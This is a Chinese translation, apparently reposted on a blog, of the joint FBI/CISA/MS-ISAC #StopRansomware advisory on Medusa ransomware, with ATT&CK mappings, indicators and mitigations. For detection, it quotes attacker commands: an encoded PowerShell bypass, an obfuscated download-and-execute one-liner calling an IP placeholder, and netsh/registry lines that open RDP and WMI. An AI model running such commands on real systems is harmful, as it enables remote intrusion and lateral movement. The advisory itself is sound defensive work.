深入解析Medusa勒索软件攻击技术与防御策略

本文详细分析了Medusa勒索软件的攻击技术,包括初始访问方法、防御规避技术、横向移动策略和数据加密过程,并提供了全面的缓解措施和检测建议,帮助组织有效应对此类威胁。

#StopRansomware: Medusa勒索软件

发布日期:2025年3月12日 警报代码:AA25-071A

组织应立即采取的行动以缓解Medusa勒索软件活动相关的网络威胁

  • 通过确保操作系统、软件和固件在风险知情的时间范围内打补丁并保持最新状态,缓解已知漏洞
  • 分割网络以限制从初始受感染设备和同一组织中的其他设备进行横向移动
  • 通过阻止未知或不受信任的来源访问内部系统上的远程服务来过滤网络流量

摘要

本联合网络安全咨询是持续#StopRansomware工作的一部分,旨在为网络防御者发布咨询,详细说明各种勒索软件变种和勒索软件威胁行为者。这些#StopRansomware咨询包括最近和历史观察到的战术、技术和程序(TTP)以及妥协指标(IOC),以帮助组织防范勒索软件。

联邦调查局(FBI)、网络安全和基础设施安全局(CISA)和多州信息共享与分析中心(MS-ISAC)发布此联合咨询,以传播已知的Medusa勒索软件TTP和IOC,这些是通过FBI调查直到2025年2月确定的。

Medusa是一种勒索软件即服务(RaaS)变种,于2021年6月首次发现。截至2025年2月,Medusa开发者和附属机构已影响超过300名受害者,涉及各种关键基础设施部门,受影响行业包括医疗、教育、法律、保险、技术和制造业。

FBI、CISA和MS-ISAC鼓励组织实施本咨询缓解部分中的建议,以降低Medusa勒索软件事件的可能性和影响。

技术细节

背景

RaaS Medusa变种从2021年至今一直被用于进行勒索软件攻击。Medusa最初作为封闭式勒索软件变种运作,意味着所有开发和相关操作都由同一组网络威胁行为者控制。虽然Medusa后来发展到使用附属模式,但重要操作(如赎金谈判)仍由开发者集中控制。Medusa开发者和附属机构(在本咨询中称为"Medusa行为者")都采用双重勒索模式,即加密受害者数据并威胁如果不支付赎金就公开泄露被窃取的数据。

初始访问

Medusa开发者通常在网络犯罪论坛和市场中招募初始访问经纪人(IAB),以获取对潜在受害者的初始访问[TA0001]。向这些附属机构提供潜在支付金额从100美元到100万美元,并有机会专门为Medusa工作。已知Medusa IAB(附属机构)利用常见技术,例如:

  • 网络钓鱼活动作为窃取受害者凭据的主要方法[T1566]
  • 通过常见漏洞和暴露(CVE)利用未修补的软件漏洞[T1190],如ScreenConnect漏洞CVE-2024-1709 [CWE-288:使用替代路径或通道进行身份验证绕过]和Fortinet EMS SQL注入漏洞[CVE-2023-48788 [CWE 89:SQL注入]]

发现

Medusa行为者使用"就地取材"(LOTL)和合法工具Advanced IP Scanner和SoftPerfect Network Scanner进行初始用户、系统和网络枚举。一旦在受害者网络中建立立足点,通常扫描的端口包括:

21(FTP)、22(SSH)、23(Telnet)、80(HTTP)、115(SFTP)、443(HTTPS)、1433(SQL数据库)、3050(Firebird数据库)、3128(HTTP web代理)、3306(MySQL数据库)、3389(RDP)

Medusa行为者主要使用PowerShell [T1059.001]和Windows命令提示符(cmd.exe)[T1059.003]进行网络[T1046]和文件系统枚举[T1083],并利用入口工具传输能力[T1105]。Medusa行为者使用Windows管理规范(WMI)[T1047]查询系统信息。

防御规避

Medusa行为者使用LOTL来避免检测[TA0005]。Certutil(certutil.exe)用于在执行文件入口时避免检测。

观察到行为者使用几种不同复杂度的PowerShell检测规避技术。此外,Medusa行为者试图通过删除PowerShell命令行历史[T1070.003]来掩盖踪迹。

在此示例中,Medusa行为者使用著名的规避技术,使用特定的执行设置执行base64加密命令[T1027.013]:

1

powershell -exec bypass -enc <base64加密命令字符串>

在另一个示例中,DownloadFile字符串通过切片并通过变量引用进行混淆[T1027]:

1

powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<RAS tool>.msi)

在最终示例中,有效载荷是一个混淆的base64字符串,读入内存,从gzip解压缩,并用于创建脚本块。base64有效载荷使用空字符串和连接进行分割,并使用格式操作符(-f)后跟三个参数来指定base64有效载荷中的字符替换。

混淆的base64 PowerShell有效载荷与powerfun.ps1相同,这是一个公开可用的暂存器脚本,可以创建反向或绑定shell over TLS以加载其他模块。在绑定shell中,脚本等待本地端口443上的连接[T1071.001],在反向shell中启动到远程端口443的连接。

在某些情况下,Medusa行为者尝试使用有漏洞或签名的驱动程序来杀死或删除端点检测和响应(EDR)工具[T1562.001]。

FBI观察到Medusa行为者使用以下工具支持命令和控制(C2)并规避检测:

  • Ligolo:一种反向隧道工具,通常用于在受感染主机和威胁行为者机器之间创建安全连接
  • Cloudflared:前身为ArgoTunnel,用于通过Cloudflare Tunnel安全地将应用程序、服务或服务器暴露给互联网,而不直接暴露它们

横向移动和执行

Medusa行为者使用各种合法的远程访问软件[T1219];他们可能根据受害者环境中已有的任何远程访问工具来调整选择,作为规避检测的手段。调查发现Medusa行为者使用远程访问软件AnyDesk、Atera、ConnectWise、eHorus、N-able、PDQ Deploy、PDQ Inventory、SimpleHelp和Splashtop。Medusa使用这些工具——结合远程桌面协议(RDP)[T1021.001]和PsExec [T1569.002]——横向移动[TA0008]通过网络并识别文件用于泄露[TA0010]和加密[T1486]。当提供有效的用户名和密码凭据时,Medusa行为者使用PsExec:

  • 将当前机器上的各种批处理脚本中的一个复制(-c)到远程机器,并以SYSTEM级别权限(-s)执行它
  • 在远程机器上以SYSTEM级别权限执行已存在的本地文件
  • 使用cmd /c执行远程shell命令

由PsExec执行的批处理脚本之一是openrdp.bat,它首先创建新的防火墙规则以允许端口3389上的入站TCP流量:

1

netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow

然后,创建允许远程WMI连接的规则:

1

netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes

最后,修改注册表以允许远程桌面连接:

1

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

还观察到使用Mimikatz进行本地安全机构子系统服务(LSASS)转储[T1003.001]以收集凭据[TA0006]并帮助横向移动。

泄露和加密

Medusa行为者安装并使用Rclone促进数据泄露到行为者和附属机构使用的Medusa C2服务器[T1567.002]。行为者使用Sysinternals PsExec、PDQ Deploy或BigFix [T1072]在网络上的文件上部署加密器gaze.exe——行为者在特定目标上禁用Windows Defender和其他防病毒服务。加密文件具有.medusa文件扩展名。进程gaze.exe终止所有与备份、安全、数据库、通信、文件共享和网站相关的服务[T1489],然后删除卷影副本[T1490]并使用AES-256加密文件,然后投放赎金记录。行为者然后手动关闭[T1529]并加密虚拟机,并删除他们先前安装的工具[T1070]。

勒索

Medusa RaaS采用双重勒索模式,受害者必须支付[T1657]才能解密文件并防止进一步发布。赎金记录要求受害者在48小时内通过基于Tor浏览器的实时聊天或通过Tox(一种端到端加密即时消息平台)进行联系。如果受害者不响应赎金记录,Medusa行为者将通过电话或电子邮件直接联系他们。Medusa运营一个.onion数据泄露站点,披露受害者以及信息发布的倒计时。赎金要求发布在网站上,带有指向Medusa附属加密货币钱包的直接超链接。在此阶段,Medusa同时在倒计时结束前向感兴趣的各方广告销售数据。受害者可以额外支付10,000美元加密货币将倒计时计时器增加一天。

FBI调查发现,在支付赎金后,一名受害者被另一名Medusa行为者联系,声称谈判者已经窃取了已支付的赎金金额,并要求再次支付一半以提供"真正的解密器"——可能表明存在三重勒索计划。

妥协指标

表1:恶意文件

文件 哈希(MD5) 描述
!!!READ_ME_MEDUSA!!!.txt 已编辑 赎金记录文件
openrdp.bat 44370f5c977e415981febf7dbb87a85c 允许传入RDP和远程WMI连接
pu.exe 80d852cd199ac923205b61658a9ec5bc 反向shell

表2:Medusa电子邮件地址

电子邮件地址 描述
key.medusa.serviceteam@protonmail.com 用于赎金谈判
medusa.support@onionmail.org 用于赎金谈判
mds.svt.breach@protonmail.com 用于赎金谈判
mds.svt.mir2@protonmail.com 用于赎金谈判
MedusaSupport@cock.li 用于赎金谈判

MITRE ATT&CK战术和技术

参见表3-表11获取本咨询中引用的所有威胁行为者战术和技术。

表3:初始访问

技术标题 ID 使用
利用面向公众的应用程序 T1190 Medusa行为者利用未修补的软件或n-day漏洞通过常见漏洞和暴露
初始访问 TA0001 Medusa行为者在网络犯罪论坛和市场中招募初始访问经纪人(IABS)以获取初始访问
网络钓鱼 T1566 Medusa IABS使用网络钓鱼活动作为向受害者提供勒索软件的主要方法

表4:防御规避

技术标题 ID 使用
指标移除:清除命令历史 T1070.003 Medusa行为者通过删除PowerShell命令行历史试图掩盖踪迹
混淆文件或信息:加密/编码文件 T1027.013 Medusa行为者使用执行base64加密命令的著名规避技术
混淆文件或信息 T1027 Medusa行为者通过切片并通过变量引用混淆字符串
指标移除 T1070 Medusa行为者删除他们先前安装的工作和工具
削弱防御:禁用或修改工具 T1562.001 Medusa行为者杀死或删除端点检测和响应工具

表5:发现

技术标题 ID 使用
网络服务发现 T1046 Medusa行为者利用就地取材技术执行网络枚举
文件和目录发现 T1083 Medusa行为者利用Windows命令提示符进行文件系统枚举
网络共享发现 T1135 Medusa行为者查询本地系统上的共享驱动器以收集信息来源
系统网络配置发现 T1016 Medusa行为者使用操作系统管理实用程序收集网络信息
系统信息发现 T1082 Medusa行为者使用命令systeminfo收集详细系统信息
权限组发现:域组 T1069.002 Medusa行为者尝试查找域级别组和权限设置

表6:凭据访问

技术标题 ID 使用
凭据访问 TA0006 Medusa行为者使用Mimikatz等工具收集凭据以获取系统访问
OS凭据转储:LSASS内存 T1003.001 观察到Medusa行为者使用Mimikatz访问存储在进程内存或本地安全机构子系统服务(LSASS)中的凭据材料

表7:横向移动和执行

技术标题 ID 使用
横向移动 TA0008 Medusa行为者一旦获得初始访问就执行技术以横向移动而不被检测
命令和脚本解释器:PowerShell T1059.001 Medusa行为者使用PowerShell,一个强大的交互式命令行界面和脚本环境,用于入口、网络和文件系统枚举
命令和脚本解释器:Windows命令shell T1059.003 Medusa行为者使用Windows命令提示符——可用于控制系统几乎任何方面——用于入口、网络和文件系统枚举
软件部署工具 T1072 Medusa行为者使用PDQ Deploy和BigFix在网络上的文件上部署加密器
远程服务:远程桌面协议 T1021.001 Medusa行为者使用远程桌面协议(RDP),操作系统中的常见功能,登录系统的交互式会话并横向移动
系统服务 T1569.002 Medusa行为者使用Sysinternals PsExec在网络上的文件上部署加密器
Windows管理规范 T1047 Medusa行为者滥用Windows管理规范查询系统信息

表8:泄露和加密

技术标题 ID 使用
泄露 TA0010 Medusa行为者识别要从受害者网络泄露的文件
通过Web服务泄露:泄露到云存储 T1567.002 Medusa行为者使用Rclone促进数据泄露到Medusa C2服务器

表9:命令和控制

技术标题 ID 使用
入口工具传输 T1105 Medusa行为者使用PowerShell、Windows命令提示符和certutil进行文件入口
应用层协议:Web协议 T1071.001 Medusa行为者使用与Web流量相关的应用层协议进行通信。在这种情况下,Medusa行为者使用在端口443上创建反向或绑定shell的脚本:HTTPS
远程访问软件 T1219 Medusa行为者使用远程访问软件横向移动通过网络

表10:持久性

技术标题 ID 使用
创建账户 T1136.002 Medusa行为者创建域账户以维持对受害者系统的访问

表11:影响

技术标题 ID 使用
数据加密以产生影响 T1486 Medusa识别并加密目标系统上的数据以中断系统和网络资源的可用性
抑制系统恢复 T1490 进程gaze.exe终止所有服务,然后删除卷影副本并使用AES-256加密文件,然后投放赎金记录
财务盗窃 T1657 受害者必须支付才能解密文件并防止Medusa行为者进一步发布
系统关机/重启 T1529 Medusa行为者手动关闭并加密虚拟机
服务停止 T1489 进程gaze.exe终止所有与备份、安全、数据库、通信、文件共享和网站相关的服务

缓解措施

FBI、CISA和MS-ISAC建议组织实施以下缓解措施,以基于威胁行为者的活动改善网络安全状况。这些缓解措施与CISA和国家标准与技术研究院(NIST)制定的跨部门网络安全性能目标(CPG)保持一致。CPG提供了CISA和NIST建议所有组织实施的最小实践和保护集。CISA和NIST基于现有网络安全框架和指南制定了CPG,以防范最常见和最有影响的威胁、战术、技术和程序。

  • 实施恢复计划,在物理上分离、分段和安全的位置(例如,硬盘、存储设备、云)维护和保留敏感或专有数据和服务器的多个副本[CPG 2.F, 2.R, 2.S]
  • 要求所有具有密码登录的账户(例如,服务账户、管理员账户和域管理员账户)符合NIST标准。特别是,要求员工使用长密码,并考虑不要求频繁更改密码,因为这可能削弱安全性[CPG 2.C]
  • 尽可能要求所有服务使用多因素认证,特别是Web邮件、虚拟专用网络和访问关键系统的账户[CPG 2.H]
  • 保持所有操作系统、软件和固件最新。及时打补丁是组织可以采取的最小化其暴露于网络安全威胁的最有效和最具成本效益的步骤之一。优先修补面向互联网系统中已知被利用的漏洞[CPG 1.E]
  • 分割网络以防止勒索软件传播。网络分割可以通过控制各种子网之间的流量流和访问以及限制对手横向移动来帮助防止勒索软件传播[CPG 2.F]
  • 使用网络监控工具识别、检测和调查异常活动以及指示勒索软件的潜在遍历。为了帮助检测勒索软件,实施记录和报告所有网络流量(包括网络上的横向移动活动)的工具。端点检测和响应(EDR)工具对于检测横向连接特别有用,因为它们对每个主机的常见和不常见网络连接有洞察力[CPG 3.A]
  • 要求远程访问使用VPN或跳板机
  • 监控未经授权的扫描和访问尝试
  • 通过阻止未知或不受信任的来源访问内部系统上的远程服务来过滤网络流量。这防止威胁行为者直接连接到他们为持久性建立的远程访问服务
  • 审核具有管理权限的用户账户,并根据最小权限原则配置访问控制[CPG 2.E]
  • 审查域控制器、服务器、工作站和活动目录中的新和/或未识别账户[CPG 1.A, 2.O]
  • 禁用命令行和脚本活动及权限。权限提升和横向移动通常依赖于从命令行运行的软件实用程序。如果威胁行为者无法运行这些工具,他们将难以提升权限和/或横向移动[CPG 2.E, 2.N]
  • 禁用未使用的端口[CPG 2.V]
  • 维护数据的离线备份,并定期维护备份和恢复[CPG 2.R]。通过实施此实践,组织有助于确保他们不会受到严重中断和/或只有不可检索的数据
  • 确保所有备份数据加密、不可变(即,无法更改或删除)并覆盖组织的整个数据基础设施[CPG 2.K, 2.L, 2.R]

验证安全控制

除了应用缓解措施外,FBI、CISA和MS-ISAC建议针对本咨询中映射到MITRE ATT&CK Matrix for Enterprise框架的威胁行为来演练、测试和验证组织的安全程序。FBI、CISA和MS-ISAC建议测试现有的安全控制清单,以评估它们如何针对本咨询中描述的ATT&CK技术执行。

开始:

  1. 选择本咨询中描述的ATT&CK技术(表3到表11)
  2. 使安全技术与该技术对齐
  3. 针对该技术测试技术
  4. 分析检测和预防技术的性能
  5. 对所有安全技术重复此过程以获得全面的性能数据集
  6. 基于此过程生成的数据调整安全程序,包括人员、流程和技术

FBI、CISA和MS-ISAC建议在生产环境中持续大规模测试安全程序,以确保针对本咨询中识别的MITRE ATT&CK技术的最佳性能。

资源

  • 联合#StopRansomware指南
  • 联合指南识别和缓解就地取材技术
  • 联合指南保护远程访问软件

报告

您的组织没有义务响应或向FBI提供信息以响应此联合咨询。如果在审查提供的信息后,您的组织决定向FBI提供信息,报告必须符合适用的州和联邦法律。

FBI对可以共享的任何信息感兴趣,包括显示与外国IP地址通信的边界日志、赎金记录样本、与威胁行为者的通信、比特币钱包信息、解密器文件和/或加密文件的良性样本。

其他感兴趣的细节包括目标公司联系人、感染状态和范围、估计损失、运营影响、交易ID、感染日期、检测日期、初始攻击向量以及基于主机和网络的指标。

FBI、CISA和MS-ISAC不鼓励支付赎金,因为支付不能保证受害者文件将被恢复。此外,支付还可能鼓励对手针对其他组织,鼓励其他犯罪行为者参与勒索软件分发,和/或资助非法活动。无论您或您的组织是否决定支付赎金,FBI、CISA和MS-ISAC敦促您及时向FBI的互联网犯罪投诉中心(IC3)、当地FBI现场办公室或CISA通过该机构的事件报告系统或其24/7运营中心(report@cisa.gov)或致电1-844-Say-CISA(1-844-729-2472)报告勒索软件事件。

附录A:Medusa命令

这些命令明确演示了Medusa威胁行为者在受害者网络内获得立足点后使用的方法。事件响应者和威胁猎人可以使用此信息检测恶意活动。系统管理员可以使用此信息设计允许列表/拒绝列表策略或其他保护机制。

(此处包含大量技术命令,涉及certutil、系统信息查询、网络配置、PowerShell脚本、PsExec执行等具体技术操作)

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次